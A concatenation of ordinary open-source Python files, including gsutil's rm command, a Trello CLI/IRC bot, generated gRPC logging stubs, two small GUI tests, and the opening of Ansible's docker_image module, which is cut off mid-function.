provider_url_ok=False,
urls_start_arg=0,
gs_api_support=[ApiSelector.XML, ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
argparse_arguments=[
CommandArgument.MakeZeroOrMoreCloudURLsArgument()
]
)
# Help specification. See help_provider.py for documentation.
help_spec = Command.HelpSpec(
help_name='rm',
help_name_aliases=['del', 'delete', 'remove'],
help_type='command_help',
help_one_line_summary='Remove objects',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
def RunCommand(self):
"""Command entry point for the rm command."""
# self.recursion_requested is initialized in command.py (so it can be
# checked in parent class for all commands).
self.continue_on_error = self.parallel_operations
self.read_args_from_stdin = False
self.all_versions = False
if self.sub_opts:
for o, unused_a in self.sub_opts:
if o == '-a':
self.all_versions = True
elif o == '-f':
self.continue_on_error = True
elif o == '-I':
self.read_args_from_stdin = True
elif o == '-r' or o == '-R':
self.recursion_requested = True
self.all_versions = True
if self.read_args_from_stdin:
if self.args:
raise CommandException('No arguments allowed with the -I flag.')
url_strs = StdinIterator()
else:
if not self.args:
raise CommandException('The rm command (without -I) expects at '
'least one URL.')
url_strs = self.args
# Tracks number of object deletes that failed.
self.op_failure_count = 0
# Tracks if any buckets were missing.
self.bucket_not_found_count = 0
# Tracks buckets that are slated for recursive deletion.
bucket_urls_to_delete = []
self.bucket_strings_to_delete = []
if self.recursion_requested:
bucket_fields = ['id']
for url_str in url_strs:
url = StorageUrlFromString(url_str)
if url.IsBucket() or url.IsProvider():
for blr in self.WildcardIterator(url_str).IterBuckets(
bucket_fields=bucket_fields):
bucket_urls_to_delete.append(blr.storage_url)
self.bucket_strings_to_delete.append(url_str)
self.preconditions = PreconditionsFromHeaders(self.headers or {})
try:
# Expand wildcards, dirs, buckets, and bucket subdirs in URLs.
name_expansion_iterator = NameExpansionIterator(
self.command_name, self.debug, self.logger, self.gsutil_api,
url_strs, self.recursion_requested, project_id=self.project_id,
all_versions=self.all_versions,
continue_on_error=self.continue_on_error or self.parallel_operations)
seek_ahead_iterator = None
# Cannot seek ahead with stdin args, since we can only iterate them
# once without buffering in memory.
if not self.read_args_from_stdin:
seek_ahead_iterator = SeekAheadNameExpansionIterator(
self.command_name, self.debug, self.GetSeekAheadGsutilApi(),
url_strs, self.recursion_requested,
all_versions=self.all_versions, project_id=self.project_id)
# Perform remove requests in parallel (-m) mode, if requested, using
# configured number of parallel processes and threads. Otherwise,
# perform requests with sequential function calls in current process.
self.Apply(_RemoveFuncWrapper, name_expansion_iterator,
_RemoveExceptionHandler,
fail_on_error=(not self.continue_on_error),
shared_attrs=['op_failure_count', 'bucket_not_found_count'],
seek_ahead_iterator=seek_ahead_iterator)
    # Assuming the bucket has versioning enabled, URLs that don't map to
# objects should throw an error even with all_versions, since the prior
# round of deletes only sends objects to a history table.
# This assumption that rm -a is only called for versioned buckets should be
# corrected, but the fix is non-trivial.
except CommandException as e:
# Don't raise if there are buckets to delete -- it's valid to say:
# gsutil rm -r gs://some_bucket
# if the bucket is empty.
if _ExceptionMatchesBucketToDelete(self.bucket_strings_to_delete, e):
DecrementFailureCount()
else:
raise
    except ServiceException as e:
if not self.continue_on_error:
raise
if self.bucket_not_found_count:
raise CommandException('Encountered non-existent bucket during listing')
if self.op_failure_count and not self.continue_on_error:
raise CommandException('Some files could not be removed.')
# If this was a gsutil rm -r command covering any bucket subdirs,
# remove any dir_$folder$ objects (which are created by various web UI
# tools to simulate folders).
if self.recursion_requested:
folder_object_wildcards = []
for url_str in url_strs:
url = StorageUrlFromString(url_str)
if url.IsObject():
folder_object_wildcards.append('%s**_$folder$' % url_str)
if folder_object_wildcards:
self.continue_on_error = True
try:
name_expansion_iterator = NameExpansionIterator(
self.command_name, self.debug,
self.logger, self.gsutil_api,
folder_object_wildcards, self.recursion_requested,
project_id=self.project_id,
all_versions=self.all_versions)
# When we're removing folder objects, always continue on error
self.Apply(_RemoveFuncWrapper, name_expansion_iterator,
_RemoveFoldersExceptionHandler,
fail_on_error=False)
except CommandException as e:
# Ignore exception from name expansion due to an absent folder file.
if not e.reason.startswith(NO_URLS_MATCHED_GENERIC):
raise
# Now that all data has been deleted, delete any bucket URLs.
for url in bucket_urls_to_delete:
self.logger.info('Removing %s...', url)
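      # Bucket listings may lag behind deletes, so the first attempt can fail
      # with NotEmptyException; retry a few times before giving up.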
@Retry(NotEmptyException, tries=3, timeout_secs=1)
def BucketDeleteWithRetry():
self.gsutil_api.DeleteBucket(url.bucket_name, provider=url.scheme)
BucketDeleteWithRetry()
if self.op_failure_count:
      plural_str = 's' if self.op_failure_count > 1 else ''
raise CommandException('%d file%s/object%s could not be removed.' % (
self.op_failure_count, plural_str, plural_str))
return 0
def RemoveFunc(self, name_expansion_result, thread_state=None):
gsutil_api = GetCloudApiInstance(self, thread_state=thread_state)
exp_src_url = name_expansion_result.expanded_storage_url
self.logger.info('Removing %s...', exp_src_url)
gsutil_api.DeleteObject(
exp_src_url.bucket_name, exp_src_url.object_name,
preconditions=self.preconditions, generation=exp_src_url.generation,
provider=exp_src_url.scheme)
PutToQueueWithTimeout(gsutil_api.status_queue,
MetadataMessage(message_time=time.time()))
| fishjord/gsutil | gslib/commands/rm.py | Python | apache-2.0 | 15,054 |
#!/usr/bin/env python
''' Interact with Trello API as a CLI or Sopel IRC bot module '''
import argparse
from datetime import date
from email.mime.text import MIMEText
import json
import os
import re
import smtplib
import sys
# sopel is only for IRC bot installation. Not required for CLI
try:
import sopel.module # pylint: disable=import-error
except ImportError:
pass
try:
from urllib import urlencode
from urllib2 import HTTPError, Request, urlopen
except ImportError:
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen
# constants
DEFAULT_LIST = "Active"
DEFAULT_SNOWFLAKE_LIST = "Snowflakes"
DEFAULT_RESOLVED_LIST = "Resolved"
BASE_URL = "https://api.trello.com/1"
EMAIL_SERVER = 'smtp.redhat.com'
EMAIL_FROM = '[email protected]'
EMAIL_REPLYTO = '[email protected]'
class Trello(object):
"""Trello object"""
def __init__(self):
"""Set object params"""
self.args = None
self.api_key = os.environ.get("trello_consumer_key", None)
self.oauth_token = os.environ.get("trello_oauth_token", None)
self.board_id = os.environ.get("trello_board_id", None)
self.board_id_long = os.environ.get("trello_board_id_long", None)
self.email_addresses = os.environ.get("trello_report_email_addresses", None)
@staticmethod
def parse_args():
"""Parse CLI arguments"""
parser = argparse.ArgumentParser(
description='Create, comment, move Trello cards, also reporting.')
subparsers = parser.add_subparsers(help='sub-command help')
parser_get = subparsers.add_parser('get',
help="""Get board information:
card list, user list or
card details""")
parser_get.add_argument(
'card',
nargs='?',
metavar='CARD_URL',
help='Card short URL to get details for')
parser_get.add_argument(
'--list', '-l',
metavar='TRELLO_LIST',
default=DEFAULT_LIST,
help='List to display cards from, e.g. "Resolved" or "Snowflakes"')
parser_get.add_argument(
'--users', '-u',
action='store_true',
help='Display board users')
parser_get.set_defaults(action='get')
parser_create = subparsers.add_parser('create',
help='Create a new card')
parser_create.set_defaults(action='create')
parser_create.add_argument(
'title', metavar='TITLE',
help='Card title')
parser_update = subparsers.add_parser('update',
help='Update an existing card')
parser_update.set_defaults(action='update')
parser_update.add_argument(
'card', metavar='CARD', help='Existing card URL')
parser_update.add_argument(
'--comment', '-c',
help='Add a comment')
parser_update.add_argument(
'--move', '-m',
metavar='LIST_NAME',
help='Move card to another list, e.g. "Resolved" or "Snowflakes"')
parser_update.add_argument(
'--assign', '-a',
metavar='USER',
help='Attach Trello user to card')
parser_update.add_argument(
'--unassign', '-u',
metavar='USER',
help='Remove Trello user from card')
parser_report = subparsers.add_parser('report',
help="Generate reports")
parser_report.set_defaults(action='report')
parser_report.add_argument(
'--email', '-e',
metavar='ADDRESS[,ADDRESS]',
help="""Comma-separated (no spaces) list of email addresses to
send report to. Overrides env var 'trello_report_email_addresses'""")
parser_report.add_argument(
'--move', '-m',
action='store_true',
help='Move cards to end-of-week list')
return parser.parse_args()
def create(self, title=None):
"""Create card"""
if not title:
title = self.args.title
card = self.trello_create(title)
return card['shortUrl']
def update(self):
"""Update card"""
if self.trello_update(self.card_id(self.args.card)):
print("Updated")
else:
sys.exit("No updates applied")
def get(self):
"""Get card details or list of cards"""
cards = None
if self.args.card:
return json.dumps(self.trello_get(self.card_id()), indent=4)
cards = self.trello_get()
results = ''
for card in cards:
members = ''
if self.args.users:
results += '{} {}\n'.format(str(card['username']),
str(card['fullName']))
else:
for member in card['idMembers']:
if member:
members += str(self.member_username(member)) + ' '
results += '{} {} ({})\n'.format(str(card['shortUrl']),
str(card['name']),
members)
return results
def report(self, email=None, move=False):
"""Generate reports"""
payload = self.report_payload()
print(payload)
_env_email = os.environ.get("trello_report_email_addresses", None)
if _env_email:
email = _env_email
if self.args:
if self.args.email:
email = self.args.email
if self.args.move:
move = self.args.move
week_number = date.today().isocalendar()[1]
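        # The ISO week number names both the email subject and the weekly
        # archive list that resolved cards are moved to.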
if email:
subj = "OpenShift SRE Report for Week #{} (ending {})".format(
week_number, date.today().strftime("%d-%m-%Y"))
_board_url = "https://trello.com/b/{}".format(
os.environ.get("trello_board_id", None))
payload = "For more information visit the SRE 24x7 board {}\n\n{}".format(
_board_url, payload)
self.email_report(email, subj, payload)
print("Report emailed to {}".format(email))
if move:
list_name = "Week #{}".format(week_number)
if self.move_cards(to_list=list_name):
print("Cards moved to list '{}'".format(list_name))
def report_payload(self):
"""Return report payload
:return: formatted report"""
data = ""
resolved_cards = self.get_list_cards(DEFAULT_RESOLVED_LIST)
data += "{}: {}\n".format(DEFAULT_LIST,
len(self.get_list_cards(DEFAULT_LIST)))
data += "{}: {}\n".format(DEFAULT_SNOWFLAKE_LIST,
len(self.get_list_cards(DEFAULT_SNOWFLAKE_LIST)))
data += "{}: {}\n".format(DEFAULT_RESOLVED_LIST,
len(resolved_cards))
data += "\n---\nResolved issues:\n---\n"
for card in resolved_cards:
data += "{} {}\n".format(card['shortUrl'], card['name'])
return data
def move_cards(self, to_list, from_list=None):
"""Move cards from one list to another
:param to_list (required): name of list to move cards to
:param from_list (optional, use default): name of list to move card from
:return: None"""
params = {}
if not to_list:
print("Cannot move: no destination list provided")
return False
if not from_list:
from_list = DEFAULT_RESOLVED_LIST
to_list_id = self.create_list(to_list)
path = "/lists/" + self.get_list_id(from_list) + "/moveAllCards"
params['idBoard'] = self.board_id_long
params['idList'] = to_list_id
return self.make_request(path, 'POST', params)
def create_list(self, name=None):
"""Create new list
:param name: name of list
:return: list ID"""
params = {}
params['name'] = name
params['idBoard'] = self.board_id_long
params['pos'] = "bottom"
newlist = self.make_request('/lists', 'POST', params)
return newlist['id']
@staticmethod
def email_report(email, subj, body):
"""Email report
:param email: email address
:param subj: email subject
:param body: email body
:return: None"""
msg = MIMEText(body)
msg['Subject'] = subj
msg['From'] = EMAIL_FROM
msg['To'] = email
msg['Reply-to'] = EMAIL_REPLYTO
smtpcxn = smtplib.SMTP(host=EMAIL_SERVER, port='25')
        smtpcxn.sendmail(EMAIL_FROM, email.split(','), msg.as_string())
smtpcxn.quit()
def get_list_cards(self, trello_list=DEFAULT_LIST):
"""Return card total for given list
:param trello_list: list name
:return: cards array"""
path = "/lists/%s/cards" % self.get_list_id(trello_list)
return self.make_request(path)
def trello_update(self, card_id, **kwargs):
"""Call trello update API
:param card_id: card ID
:return: success boolean"""
params = {}
path = None
updated = False
# handle being called via CLI or bot
if self.args:
if self.args.comment:
kwargs['comment'] = self.args.comment
if self.args.move:
kwargs['move'] = self.args.move
if self.args.assign:
kwargs['assign'] = self.args.assign
if self.args.unassign:
kwargs['unassign'] = self.args.unassign
# Since the trello API is different calls/methods for different data
# we call multiple times
if 'comment' in kwargs:
params['text'] = kwargs['comment']
path = '/cards/' + card_id + '/actions/comments'
updated = self.make_request(path, "POST", params)
if 'resolve' in kwargs:
params['idList'] = self.get_list_id(DEFAULT_RESOLVED_LIST)
path = '/cards/' + card_id
updated = self.make_request(path, "PUT", params)
if 'move' in kwargs:
params['idList'] = self.get_list_id(kwargs['move'])
path = '/cards/' + card_id
updated = self.make_request(path, "PUT", params)
if 'assign' in kwargs:
params['value'] = self.member_id(kwargs['assign'])
path = '/cards/' + card_id + '/idMembers'
updated = self.make_request(path, "POST", params)
if 'unassign' in kwargs:
path = '/cards/' + card_id + '/idMembers/' + self.member_id(kwargs['unassign'])
updated = self.make_request(path, "DELETE", params)
return updated
def trello_create(self, title):
"""Call trello create API
:param title: name/title of card
:return: card"""
params = {}
params['idList'] = self.get_list_id()
params['name'] = title
path = '/cards'
return self.make_request(path, "POST", params)
def member_username(self, memberid):
"""Get member username from member ID"""
member = self.make_request('/members/' + memberid)
return member['username']
def member_id(self, username):
"""Get member id from username"""
members = self.make_request('/boards/' + self.board_id + '/members/')
for member in members:
if username == member['username']:
return member['id']
def card_id(self, url=None):
"""Return parsed card ID from URL
example: https://trello.com/c/PZlOHgGm
returns: PZlOHgGm
:param url: trello short URL
:return: trello card ID"""
if not url:
url = self.args.card
parsed_uri = url.split("/")
return parsed_uri[-1]
def get_list_id(self, list_id=None):
"""Return the list ID
:param list_id: list ID if not default
:return: list_id"""
default = DEFAULT_LIST
if list_id:
default = list_id
path = '/boards/' + self.board_id + '/lists/'
lists = self.make_request(path)
# match board name regardless of case
pattern = re.compile(default, re.I)
for board_list in lists:
if re.match(pattern, board_list['name']):
return board_list['id']
sys.exit("List '%s' not found" % list_id)
def trello_get(self, card_id=None):
"""Get trello cards
:param card_id: trello card ID
:return: trello json"""
path = None
if card_id:
path = '/cards/' + card_id
elif self.args.users:
path = '/boards/' + self.board_id + '/members'
else:
path = '/lists/' + self.get_list_id(self.args.list) + '/cards'
results = self.make_request(path)
return results
def make_request(self, path, method="GET", params=None):
"""Trello API call
:param path: trello API path
:param method: rest call method
:param params: API params
:return: trello json"""
if not params:
params = {}
params['key'] = self.api_key
params['token'] = self.oauth_token
url = BASE_URL + path
data = None
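        # GET parameters travel on the query string; mutating methods send an
        # urlencoded body instead.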
if method == "GET":
url += '?' + urlencode(params)
elif method in ['DELETE', 'POST', 'PUT']:
data = urlencode(params).encode('utf-8')
request = Request(url)
if method in ['DELETE', 'PUT']:
request.get_method = lambda: method
try:
if data:
response = urlopen(request, data=data)
else:
response = urlopen(request)
except HTTPError as err:
print(err)
print(err.read())
result = None
else:
result = json.loads(response.read().decode('utf-8'))
return result
def get_trello_id(ircnick):
"""Return trello ID for a given IRC nick"""
key = 'IRCNICK_' + ircnick
try:
return os.environ[key]
except KeyError:
print("%s, you need to map your IRC nick with Trello username" % ircnick)
return None
@sopel.module.commands('issue')
def issue(bot, trigger):
"""Record a new issue in Trello, e.g. '.issue Some issue text'"""
trellobot = Trello()
card = trellobot.trello_create(trigger.group(2))
bot.say(card['shortUrl'])
if not trellobot.trello_update(trellobot.card_id(card['shortUrl']),
assign=get_trello_id(trigger.nick)):
bot.reply(
"you need to map your IRC nick with Trello username." +
"See https://github.com/openshift/openshift-ansible-ops/tree/prod/playbooks/adhoc/ircbot")
@sopel.module.commands('comment')
def comment(bot, trigger):
"""Add comment to a trello card, e.g. '.comment <trelloShortUrl> My comment'"""
trellobot = Trello()
msg = trigger.group(2).partition(' ')
trellobot.trello_update(trellobot.card_id(msg[0]), comment=msg[2])
bot.say('Comment added')
@sopel.module.commands('resolve', 'resolved')
def resolve(bot, trigger):
"""Resolve a trello card, e.g. '.resolve <trelloShortUrl>'"""
trellobot = Trello()
if trellobot.trello_update(trellobot.card_id(trigger.group(2)), resolve=True):
card = trellobot.trello_get(trellobot.card_id(trigger.group(2)))
bot.say('Resolved {}: {}'.format(trigger.group(2), card['name']))
else:
bot.say('Could not resolve %s' % trigger.group(2))
def main():
"""
main() function
:return:
"""
trello = Trello()
trello.args = Trello.parse_args()
    if trello.args.action == 'create':
        print(trello.create())
    elif trello.args.action == 'get':
        print(trello.get())
    elif trello.args.action == 'update':
        trello.update()
    elif trello.args.action == 'report':
        trello.report()
if __name__ == "__main__":
main()
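
# Example CLI usage (hypothetical card title; the short URL is the sample from
# the card_id() docstring, and the trello_* environment variables must be set):
#
#   trello.py create "Investigate failed deploys"
#   trello.py update https://trello.com/c/PZlOHgGm --comment "Looking into it"
#   trello.py get --list Resolved
#   trello.py report --move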
| appuio/ansible-role-openshift-zabbix-monitoring | vendor/openshift-tools/openshift_tools/ircbot/trello/trello.py | Python | apache-2.0 | 16,279 |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
import google.cloud.proto.logging.v2.logging_metrics_pb2 as google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2
import google.protobuf.empty_pb2 as google_dot_protobuf_dot_empty__pb2
class MetricsServiceV2Stub(object):
"""Service for configuring logs-based metrics.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ListLogMetrics = channel.unary_unary(
'/google.logging.v2.MetricsServiceV2/ListLogMetrics',
request_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.ListLogMetricsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.ListLogMetricsResponse.FromString,
)
self.GetLogMetric = channel.unary_unary(
'/google.logging.v2.MetricsServiceV2/GetLogMetric',
request_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.GetLogMetricRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.FromString,
)
self.CreateLogMetric = channel.unary_unary(
'/google.logging.v2.MetricsServiceV2/CreateLogMetric',
request_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.CreateLogMetricRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.FromString,
)
self.UpdateLogMetric = channel.unary_unary(
'/google.logging.v2.MetricsServiceV2/UpdateLogMetric',
request_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.UpdateLogMetricRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.FromString,
)
self.DeleteLogMetric = channel.unary_unary(
'/google.logging.v2.MetricsServiceV2/DeleteLogMetric',
request_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.DeleteLogMetricRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class MetricsServiceV2Servicer(object):
"""Service for configuring logs-based metrics.
"""
def ListLogMetrics(self, request, context):
"""Lists logs-based metrics.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetLogMetric(self, request, context):
"""Gets a logs-based metric.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateLogMetric(self, request, context):
"""Creates a logs-based metric.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateLogMetric(self, request, context):
"""Creates or updates a logs-based metric.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteLogMetric(self, request, context):
"""Deletes a logs-based metric.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MetricsServiceV2Servicer_to_server(servicer, server):
rpc_method_handlers = {
'ListLogMetrics': grpc.unary_unary_rpc_method_handler(
servicer.ListLogMetrics,
request_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.ListLogMetricsRequest.FromString,
response_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.ListLogMetricsResponse.SerializeToString,
),
'GetLogMetric': grpc.unary_unary_rpc_method_handler(
servicer.GetLogMetric,
request_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.GetLogMetricRequest.FromString,
response_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.SerializeToString,
),
'CreateLogMetric': grpc.unary_unary_rpc_method_handler(
servicer.CreateLogMetric,
request_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.CreateLogMetricRequest.FromString,
response_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.SerializeToString,
),
'UpdateLogMetric': grpc.unary_unary_rpc_method_handler(
servicer.UpdateLogMetric,
request_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.UpdateLogMetricRequest.FromString,
response_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.SerializeToString,
),
'DeleteLogMetric': grpc.unary_unary_rpc_method_handler(
servicer.DeleteLogMetric,
request_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.DeleteLogMetricRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.logging.v2.MetricsServiceV2', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| eoogbe/api-client-staging | generated/python/proto-google-cloud-logging-v2/google/cloud/proto/logging/v2/logging_metrics_pb2_grpc.py | Python | bsd-3-clause | 5,957 |
''' Test idlelib.debugger.
Coverage: 19%
'''
from idlelib import debugger
from test.support import requires
requires('gui')
import unittest
from tkinter import Tk
class NameSpaceTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.root = Tk()
cls.root.withdraw()
@classmethod
def tearDownClass(cls):
cls.root.destroy()
del cls.root
def test_init(self):
debugger.NamespaceViewer(self.root, 'Test')
if __name__ == '__main__':
unittest.main(verbosity=2)
| yotchang4s/cafebabepy | src/main/python/idlelib/idle_test/test_debugger.py | Python | bsd-3-clause | 533 |
#!/usr/bin/env python
'''Test RGBA load using the platform decoder (QuickTime, Quartz, GDI+ or Gdk).
You should see the rgba.png image on a checkboard background.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import unittest
import base_load
import sys
if sys.platform == 'linux2':
from pyglet.image.codecs.gdkpixbuf2 import GdkPixbuf2ImageDecoder as dclass
elif sys.platform in ('win32', 'cygwin'):
from pyglet.image.codecs.gdiplus import GDIPlusDecoder as dclass
elif sys.platform == 'darwin':
from pyglet import options as pyglet_options
if pyglet_options['darwin_cocoa']:
from pyglet.image.codecs.quartz import QuartzImageDecoder as dclass
else:
from pyglet.image.codecs.quicktime import QuickTimeImageDecoder as dclass
class TEST_PLATFORM_RGBA_LOAD(base_load.TestLoad):
texture_file = 'rgba.png'
decoder = dclass()
if __name__ == '__main__':
unittest.main()
| mpasternak/pyglet-fix-issue-518-522 | tests/image/PLATFORM_RGBA_LOAD.py | Python | bsd-3-clause | 963 |
#!/usr/bin/python
#
# Copyright 2016 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'committer',
'version': '1.0'}
DOCUMENTATION = '''
---
module: docker_image
short_description: Manage docker images.
version_added: "1.5"
description:
- Build, load or pull an image, making the image available for creating containers. Also supports tagging an
image into a repository and archiving an image to a .tar file.
options:
archive_path:
description:
- Use with state C(present) to archive an image to a .tar file.
required: false
version_added: "2.1"
load_path:
description:
- Use with state C(present) to load an image from a .tar file.
required: false
version_added: "2.2"
dockerfile:
description:
- Use with state C(present) to provide an alternate name for the Dockerfile to use when building an image.
default: Dockerfile
required: false
version_added: "2.0"
force:
description:
      - Use with state C(absent) to un-tag and remove all images matching the specified name. Use with state
        C(present) to build, load or pull an image when the image already exists.
default: false
required: false
version_added: "2.1"
http_timeout:
description:
- Timeout for HTTP requests during the image build operation. Provide a positive integer value for the number of
seconds.
required: false
version_added: "2.1"
name:
description:
- "Image name. Name format will be one of: name, repository/name, registry_server:port/name.
When pushing or pulling an image the name can optionally include the tag by appending ':tag_name'."
required: true
path:
description:
- Use with state 'present' to build an image. Will be the path to a directory containing the context and
Dockerfile for building an image.
aliases:
- build_path
required: false
pull:
description:
- When building an image downloads any updates to the FROM image in Dockerfile.
default: true
required: false
version_added: "2.1"
push:
description:
- Push the image to the registry. Specify the registry as part of the I(name) or I(repository) parameter.
default: false
required: false
version_added: "2.2"
rm:
description:
- Remove intermediate containers after build.
default: true
required: false
version_added: "2.1"
nocache:
description:
- Do not use cache when building an image.
default: false
required: false
repository:
description:
- Full path to a repository. Use with state C(present) to tag the image into the repository. Expects
format I(repository:tag). If no tag is provided, will use the value of the C(tag) parameter or I(latest).
required: false
version_added: "2.1"
state:
description:
- Make assertions about the state of an image.
- When C(absent) an image will be removed. Use the force option to un-tag and remove all images
matching the provided name.
- When C(present) check if an image exists using the provided name and tag. If the image is not found or the
force option is used, the image will either be pulled, built or loaded. By default the image will be pulled
from Docker Hub. To build the image, provide a path value set to a directory containing a context and
Dockerfile. To load an image, specify load_path to provide a path to an archive file. To tag an image to a
repository, provide a repository path. If the name contains a repository path, it will be pushed.
- "NOTE: C(build) is DEPRECATED and will be removed in release 2.3. Specifying C(build) will behave the
same as C(present)."
required: false
default: present
choices:
- absent
- present
- build
tag:
description:
- Used to select an image when pulling. Will be added to the image when pushing, tagging or building. Defaults to
I(latest).
- If C(name) parameter format is I(name:tag), then tag value from C(name) will take precedence.
default: latest
required: false
buildargs:
description:
- Provide a dictionary of C(key:value) build arguments that map to Dockerfile ARG directive.
- Docker expects the value to be a string. For convenience any non-string values will be converted to strings.
- Requires Docker API >= 1.21 and docker-py >= 1.7.0.
type: complex
required: false
version_added: "2.2"
container_limits:
description:
- A dictionary of limits applied to each container created by the build process.
required: false
version_added: "2.1"
type: complex
contains:
memory:
description: Set memory limit for build
type: int
memswap:
description: Total memory (memory + swap), -1 to disable swap
type: int
cpushares:
description: CPU shares (relative weight)
type: int
cpusetcpus:
description: CPUs in which to allow execution, e.g., "0-3", "0,1"
type: str
use_tls:
description:
- "DEPRECATED. Whether to use tls to connect to the docker server. Set to C(no) when TLS will not be used. Set to
C(encrypt) to use TLS. And set to C(verify) to use TLS and verify that the server's certificate is valid for the
server. NOTE: If you specify this option, it will set the value of the tls or tls_verify parameters."
choices:
- no
- encrypt
- verify
default: no
required: false
version_added: "2.0"
extends_documentation_fragment:
- docker
requirements:
- "python >= 2.6"
- "docker-py >= 1.7.0"
- "Docker API >= 1.20"
authors:
- Pavel Antonov (@softzilla)
- Chris Houseknecht (@chouseknecht)
- James Tanner (@jctanner)
'''
EXAMPLES = '''
- name: pull an image
docker_image:
name: pacur/centos-7
- name: Tag and push to docker hub
docker_image:
name: pacur/centos-7
repository: dcoppenhagan/myimage
tag: 7.0
push: yes
- name: Tag and push to local registry
docker_image:
name: centos
repository: localhost:5000/centos
tag: 7
push: yes
- name: Remove image
docker_image:
state: absent
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
- name: Build an image and push it to a private repo
docker_image:
path: ./sinatra
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
push: yes
- name: Archive image
docker_image:
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
archive_path: my_sinatra.tar
- name: Load image from archive and push to a private registry
docker_image:
name: localhost:5000/myimages/sinatra
tag: v1
push: yes
load_path: my_sinatra.tar
- name: Build image and with buildargs
docker_image:
path: /path/to/build/dir
name: myimage
buildargs:
log_volume: /var/log/myapp
listen_port: 8080
'''
RETURN = '''
image:
description: Image inspection results for the affected image.
returned: success
type: complex
sample: {}
'''
from ansible.module_utils.docker_common import *
try:
from docker.auth.auth import resolve_repository_name
from docker.utils.utils import parse_repository_tag
except ImportError:
# missing docker-py handled in docker_common
pass
class ImageManager(DockerBaseClass):
def __init__(self, client, results):
super(ImageManager, self).__init__()
self.client = client
self.results = results
parameters = self.client.module.params
self.check_mode = self.client.check_mode
self.archive_path = parameters.get('archive_path')
self.container_limits = parameters.get('container_limits')
self.dockerfile = parameters.get('dockerfile')
self.force = parameters.get('force')
self.load_path = parameters.get('load_path')
self.name = parameters.get('name')
self.nocache = parameters.get('nocache')
self.path = parameters.get('path')
self.pull = parameters.get('pull')
self.repository = parameters.get('repository')
self.rm = parameters.get('rm')
self.state = parameters.get('state')
self.tag = parameters.get('tag')
self.http_timeout = parameters.get('http_timeout')
self.push = parameters.get('push')
self.buildargs = parameters.get('buildargs')
# If name contains a tag, it takes precedence over tag parameter.
repo, repo_tag = parse_repository_tag(self.name)
if repo_tag:
self.name = repo
self.tag = repo_tag
if self.state in ['present', 'build']:
self.present()
elif self.state == 'absent':
self.absent()
def fail(self, msg):
self.client.fail(msg)
def present(self):
'''
Handles state = 'present', which includes building, loading or pulling an image,
depending on user provided parameters.
:returns None
'''
image = self.client.find_image(name=self.name, tag=self.tag)
if not image or self.force:
if self.path:
# Build the image
if not os.path.isdir(self.path):
self.fail("Requested build path %s could not be found or you do not have access." % self.path)
image_name = self.name
if self.tag:
